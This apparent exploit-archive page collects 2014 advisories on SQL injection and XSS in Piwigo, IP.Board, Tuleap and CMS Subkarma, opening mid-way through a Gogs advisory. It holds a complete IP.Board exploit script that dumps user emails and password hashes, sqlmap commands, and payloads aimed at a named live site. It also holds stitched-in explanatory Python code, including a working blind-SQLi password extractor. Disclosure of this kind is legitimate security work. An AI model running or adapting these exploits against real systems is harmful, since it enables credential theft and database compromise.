2014-11-14: CVE-ID assigned
 
 
Credits
=======
Pascal Turbing <pturbing@ernw.de>
Jiahua (Joe) Chen <u@gogs.io>
 
 
References
==========
[1] https://github.com/gogits/gogs
[2] http://gogs.io/
[3]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-1/
[4]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-2/
[5]
http://www.insinuator.net/2012/06/sql-injection-testing-for-business-purposes-part-3/
[6] https://www.ernw.de/download/BC-1401.txt
 
 
Advisory-ID
===========
BC-1401
 
 
Disclaimer
==========
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
 
--
Timo Schmid
 
ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg  -  www.ernw.de
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 151 16227192
PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0
 
Handelsregister Mannheim: HRB 337135
Geschaeftsfuehrer: Enno Rey
 


14Nov/14

Piwigo <= v2.6.0 – Blind SQL Injection

=============================================
MGC ALERT 2014-001
- Original release date: January 12, 2014
- Last revised:  November 12, 2014
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=============================================
 
I. VULNERABILITY
-------------------------
Blind SQL Injection in Piwigo <= v2.6.0
 
II. BACKGROUND
-------------------------
Piwigo is a web application for managing photo albums, available under the GPL license.
It is written in PHP and requires a MySQL, PostgreSQL or SQLite database.
 
III. DESCRIPTION
-------------------------
This bug was found using the portal without authentication. To exploit the vulnerability it is only necessary to use version 1.0 of the HTTP protocol to interact with the application.
It is possible to inject SQL code in the variable "rate" on the page "picture.php".
 
IV. PROOF OF CONCEPT
-------------------------
The following URLs and parameters have been confirmed to suffer from Blind SQL injection.
 
/piwigo/picture.php?/1/category/1&action=rate (POST parameter: rate=1)
 
Exploiting with SQLMap:
 
python sqlmap.py -u "http://192.168.244.129/piwigo/picture.php?/1/category/1&action=rate" --data "rate=1" --dbs
 
[16:32:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[16:32:25] [INFO] fetching database names
[16:32:25] [INFO] fetching number of databases
[16:32:25] [INFO] resumed: 4
[16:32:25] [INFO] resumed: information_schema
[16:32:25] [INFO] resumed: mysql
[16:32:25] [INFO] resumed: phpmyadmin
[16:32:25] [INFO] resumed: piwigo
available databases [4]:
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] piwigo
 
V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server compromise can result from these attacks. 
Client systems can also be targeted, and complete compromise of these client systems is also possible.
 
VI. SYSTEMS AFFECTED
-------------------------
Piwigo <= v2.6.0
 
VII. SOLUTION
-------------------------
All data received by the application that can be modified by the user must be validated before any kind of transaction is made with it.
 
VIII. REFERENCES
-------------------------
http://www.piwigo.org
 
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
 
X. REVISION HISTORY
-------------------------
January 21, 2014 1: Initial release
 
 
XI. DISCLOSURE TIMELINE
-------------------------
January 21, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas
November 12, 2014 2: Send to the Full-Disclosure lists
 
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
 
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester


11Nov/14

IP.Board 3.4.7 SQL Injection

#!/usr/bin/env python3
# Sunday, November 09, 2014 - secthrowaway@safe-mail.net
# IP.Board <= 3.4.7 SQLi (blind, error based);
# you can adapt to other types of blind injection if 'cache/sql_error_latest.cgi' is unreadable
# (Python 3 port; payload, endpoints and request flow are those of the original script)

url = 'http://target.tld/forum/'
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"

import sys, re
import urllib.request, urllib.parse, urllib.error

# <socks> - http://sourceforge.net/projects/socksipy/ (PySocks offers the same API on Python 3)
#import socks, socket
#socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
#socket.socket = socks.socksocket
# </socks>

def inject(sql):
  # Injection point: the second id[] value handled by the ipsconnect login action.
  # extractvalue() is fed an invalid XPath built from the query result, so MySQL
  # raises "XPATH syntax error: ':<result>'"; IP.Board answers 503 and writes the
  # error to cache/sql_error_latest.cgi, which is then fetched and parsed.
  payload = '-1) and 1!="\'" and extractvalue(1,concat(0x3a,(%s)))#\'' % sql
  body = ('act=login&idType=id&id[]=-1&id[]=%s' % urllib.parse.quote(payload)).encode()
  try:
    urllib.request.urlopen(urllib.request.Request('%sinterface/ipsconnect/ipsconnect.php' % url, data=body, headers={"User-agent": ua}))
  except urllib.error.HTTPError as e:
    if e.code == 503:
      data = urllib.request.urlopen(urllib.request.Request('%scache/sql_error_latest.cgi' % url, headers={"User-agent": ua})).read().decode('utf-8', 'replace')
      txt = re.search("XPATH syntax error: ':(.*)'", data, re.MULTILINE)
      if txt is not None:
        return txt.group(1)
      sys.exit('Error [3], received unexpected data:\n%s' % data)
    sys.exit('Error [1]')
  sys.exit('Error [2]')  # no HTTP error at all: the error-based oracle did not fire

def get(name, table, num):
  # MySQL truncates the XPath error text to 32 characters; the ':' marker takes one,
  # so anything longer than 31 characters is read back in 31-character SUBSTRING() slices.
  sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num)
  s = int(inject('LENGTH((%s))' % sqli))
  if s < 31:
    return inject(sqli)
  r = ''
  for i in range(1, s+1, 31):
    r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31))
  return r

n = inject('SELECT COUNT(*) FROM members')
print('* Found %s users' % n)
for j in range(int(n)):
  print(get('member_id', 'members', j))
  print(get('name', 'members', j))
  print(get('email', 'members', j))
  print(get('CONCAT(members_pass_hash, 0x3a, members_pass_salt)', 'members', j))
  print('----------------')
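The 31-character slicing in get() exists because MySQL copies at most 32 characters of the offending XPath expression into its error message, and the exploit's ':' marker uses one of them. As an added example, separate from the script above and not part of it, this Python sketch replays the same extraction logic against a constructed offline stand-in for the error oracle, so the truncation and the chunked reassembly can be seen without a target. SECRET, the fake error generator and the query shapes it recognises are all made up for the demonstration.

```python
import re

# Constructed value the attacker is after (a made-up hash:salt pair, 38 characters).
SECRET = "5f4dcc3b5aa765d61d8327deb882cf99:a1b2c"

def fake_mysql_error(expr_result):
    """Imitate MySQL's extractvalue() failure: at most 32 characters of the bad
    XPath expression end up in "XPATH syntax error: '...'" . The exploit's 0x3a
    marker is one of those 32, which leaves 31 usable characters per error."""
    return "XPATH syntax error: '%s'" % (":" + expr_result)[:32]

def fake_oracle(sql):
    """Stand-in for the target database: answers the three query shapes the exploit
    sends (LENGTH, SUBSTRING, bare SELECT) using SECRET as the selected value."""
    m = re.fullmatch(r"LENGTH\(\((.*)\)\)", sql)
    if m:
        return fake_mysql_error(str(len(SECRET)))
    m = re.fullmatch(r"SUBSTRING\(\((.*)\), (\d+), (\d+)\)", sql)
    if m:
        start, length = int(m.group(2)), int(m.group(3))
        return fake_mysql_error(SECRET[start - 1:start - 1 + length])
    return fake_mysql_error(SECRET)

def inject(sql, oracle=fake_oracle):
    # Same regex the exploit applies to cache/sql_error_latest.cgi.
    txt = re.search("XPATH syntax error: ':(.*)'", oracle(sql), re.MULTILINE)
    return txt.group(1) if txt else None

def get_long(sqli, inject=inject):
    """The exploit's chunking logic on its own: learn the length, then pull the
    value out in 31-character SUBSTRING() slices, one error message per slice."""
    s = int(inject('LENGTH((%s))' % sqli))
    if s < 31:
        return inject(sqli)
    return ''.join(inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31)) for i in range(1, s + 1, 31))

def demo():
    q = "SELECT CONCAT(members_pass_hash, 0x3a, members_pass_salt) FROM members LIMIT 0,1"
    naive = inject(q)        # one shot: silently truncated to 31 characters
    chunked = get_long(q)    # two slices, reassembled into the full value
    return naive, chunked

if __name__ == "__main__":
    naive, chunked = demo()
    print("single error  :", naive, "(%d chars)" % len(naive))
    print("chunked       :", chunked, "(%d chars)" % len(chunked))
```

The naive read is the trap worth remembering: a 32-character MD5 followed by a salt comes back looking complete but is missing its tail, and nothing in the error message says so. Querying LENGTH() first, as the exploit does, is what makes the loss detectable.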


29Oct/14

Tuleap 7.4.99.5 Blind SQL Injection

Vulnerability title: Tuleap <= 7.4.99.5 Authenticated Blind SQL Injection in Enalean Tuleap
CVE: CVE-2014-7176
Vendor: Enalean
Product: Tuleap
Affected version: 7.4.99.5 and earlier
Fixed version: 7.5
Reported by: Jerzy Kramarz
 
Details:
 
SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injections:
 
 
GET /plugins/docman/?group_id=100&id=16&action=search&global_txt=a<SQL Injection>&global_filtersubmit=Apply HTTP/1.1
Host: 192.168.56.108
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.56.108/plugins/docman/?group_id=100
Cookie: PHPSESSID=3pt0ombsmp0t9adujgrohv8mb6; TULEAP_session_hash=d51433e1f7c9b49079c0e5c511d64c96
Connection: keep-alive
 
 
Note: In order to exploit this vulnerability an attacker needs to be in a position to access the '/plugins/docman/' URL, i.e. to hold an authenticated session.
 
 
Further details at:
 
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7176/
 
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
 
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
 
 

14Oct/14

CMS Subkarma Cross Site Scripting / SQL Injection

# Multiple SQL Injection & XSS on CMS SUBKARMA
 
# Risk: High
 
# CWE number: CWE-89,CWE-79
 
# Date: 13/10/2014
 
# Vendor: www.jttel.com.tw
 
# Author: Felipe " Renzi " Gabriel
 
# Contact: renzi@linuxmail.org
 
# Tested on:  Linux Mint ; Firefox ; Sqlmap 1.0-dev-nongit-20140906
 
# Vulnerable Files: news.php ; product.php ; pro_con.php
 
# Exploits: http://www.target.com/news.php?id=[XSS]
 
            http://www.target.com/product.php?cat_id=[SQLI] & [XSS]
 
            http://www.target.com/pro_con.php?id=[SQLI] & [XSS]
 
 
# PoC:      http://www.cideko.com/product.php?cat_id=18  
 
            http://www.cideko.com/pro_con.php?id=3 
 
 
--- "SQLI using SQLMAP."--- 
 
    Place: GET
    Parameter: cat_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat_id=18 AND 6427=6427
 
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: cat_id=18 AND 7867=BENCHMARK(5000000,MD5(0x4d666b6e))
---
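Both the Tuleap advisory above and this sqlmap output stop at the oracle: a request whose response differs depending on whether an injected condition is true. As an added example (not code from either advisory, from Subkarma or from Tuleap), the following Python/sqlite3 sketch wires such a boolean oracle to a binary-search extractor that recovers a string from another table, the step sqlmap performs after the "AND 6427=6427" confirmation. The schema, rows and the `product.php?cat_id=`-style lookup are constructed for the demonstration; SQLite's LENGTH()/SUBSTR()/UNICODE() stand in for MySQL's LENGTH()/MID()/ORD().

```python
import sqlite3

# Constructed stand-in for the target application. Schema and rows are invented
# for this example and are not Subkarma's or Tuleap's.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE product (cat_id INTEGER, name TEXT);
        INSERT INTO product VALUES (18, 'widget');
        CREATE TABLE users (id INTEGER, login TEXT, pw TEXT);
        INSERT INTO users VALUES (1, 'admin', 'S3cret!');
    """)
    return db

def page(db, cat_id):
    """Vulnerable lookup in the style of product.php?cat_id=...: the parameter is
    spliced into the WHERE clause. All the attacker can observe is whether the
    page rendered a product, i.e. whether any row came back."""
    rows = db.execute("SELECT name FROM product WHERE cat_id = %s" % cat_id).fetchall()
    return len(rows) > 0

def ask(db, condition):
    """One boolean-oracle query, 'cat_id=18 AND (<condition>)', the shape of
    sqlmap's '18 AND 6427=6427' probe. True keeps the real row, false hides it."""
    return page(db, "18 AND (%s)" % condition)

def bisect_value(db, predicate, lo, hi):
    """Binary-search an integer in [lo, hi]. `predicate` has one %d slot and is
    true when the hidden value exceeds the probe; about log2(hi - lo) queries."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(db, predicate % mid):
            lo = mid + 1
        else:
            hi = mid
    return lo

def extract(db, expr, max_len=64):
    """Recover the text value of the scalar subquery `expr`: first its length,
    then each character's code point (7 queries per character for ASCII)."""
    length = bisect_value(db, "LENGTH((%s)) > %%d" % expr, 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        code = bisect_value(db, "UNICODE(SUBSTR((%s), %d, 1)) > %%d" % (expr, pos), 0, 127)
        chars.append(chr(code))
    return ''.join(chars)

def demo():
    db = make_db()
    probe_true = ask(db, "6427=6427")    # the confirmation pair sqlmap reports
    probe_false = ask(db, "6427=6428")
    leaked = extract(db, "SELECT pw FROM users WHERE login = 'admin'")
    return probe_true, probe_false, leaked

if __name__ == "__main__":
    print(demo())
```

The time-based payload in the same sqlmap output is the identical inference with a different oracle: when the page looks the same either way, `ask` is rewritten to return whether the response took longer than a threshold (the BENCHMARK() call only runs when the condition is true), and the extractor above needs no other change.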
 
 
--- " XSS using HTML injection."---
 
    http://www.cideko.com/news.php?id=38"><marquee>XSS</marquee>
 
    http://www.cideko.com/product.php?cat_id=18"><marquee>XSS</marquee>
 
    http://www.cideko.com/pro_con.php?id=3"><marquee>XSS</marquee>
 
# Note
 
The SQL injection in pro_con.php (parameter id) was previously published by Ali Pandidan.
Reference, http://cxsecurity.com/issue/WLB-2011020004 .
 
# Thanks
